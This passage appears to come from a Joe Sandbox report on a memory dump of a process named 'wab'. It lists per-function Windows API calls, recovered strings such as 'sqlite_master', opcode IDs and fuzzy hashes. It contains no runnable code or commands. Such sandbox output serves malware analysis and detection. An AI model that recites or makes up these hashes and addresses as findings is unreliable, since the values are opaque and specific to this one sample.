                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004144E7
                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                  • memset.MSVCRT ref: 0041451A
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  • API String ID: 1127616056-0
                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  • API String ID: 438689982-3163232059
                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  • API String ID: 3917621476-0
                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                  • wcscat.MSVCRT ref: 0041101F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  • API String ID: 822687973-0
                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                  • malloc.MSVCRT ref: 00417459
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                  • String ID:
                                                  • API String ID: 2678498856-0
                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item
                                                  • String ID:
                                                  • API String ID: 3888421826-0
                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00417B7B
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  • API String ID: 3727323765-0
                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                  • malloc.MSVCRT ref: 00417407
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F673
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                  • strlen.MSVCRT ref: 0040F6A2
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F6E2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                  • strlen.MSVCRT ref: 0040F70D
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00402FD7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                  • strlen.MSVCRT ref: 00403006
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                  • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                  • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                  • String ID:
                                                  • API String ID: 764393265-0
                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Time$System$File$LocalSpecific
                                                  • String ID:
                                                  • API String ID: 979780441-0
                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcpy.MSVCRT ref: 004134E0
                                                  • memcpy.MSVCRT ref: 004134F2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$DialogHandleModuleParam
                                                  • String ID:
                                                  • API String ID: 1386444988-0
                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: InvalidateMessageRectSend
                                                  • String ID: d=E
                                                  • API String ID: 909852535-3703654223
                                                  • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                  • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                  • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 0040F79E
                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcschr$memcpywcslen
                                                  • String ID: "
                                                  • API String ID: 1983396471-123907689
                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • _memicmp.MSVCRT ref: 0040C00D
                                                  • memcpy.MSVCRT ref: 0040C024
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FilePointer_memicmpmemcpy
                                                  • String ID: URL
                                                  • API String ID: 2108176848-3574463123
                                                  • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                  • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                  • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemcpy
                                                  • String ID: %2.2X
                                                  • API String ID: 2789212964-323797159
                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf
                                                  • String ID: %%-%d.%ds
                                                  • API String ID: 3988819677-2008345750
                                                  • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                  • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                  • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040E770
                                                  • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSendmemset
                                                  • String ID: F^@
                                                  • API String ID: 568519121-3652327722
                                                  • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                  • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PlacementWindowmemset
                                                  • String ID: WinPos
                                                  • API String ID: 4036792311-2823255486
                                                  • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                  • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                  • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 0040DCE9
                                                  • wcscat.MSVCRT ref: 0040DCFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamewcscatwcsrchr
                                                  • String ID: _lng.ini
                                                  • API String ID: 383090722-1948609170
                                                  • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                  • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                  • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
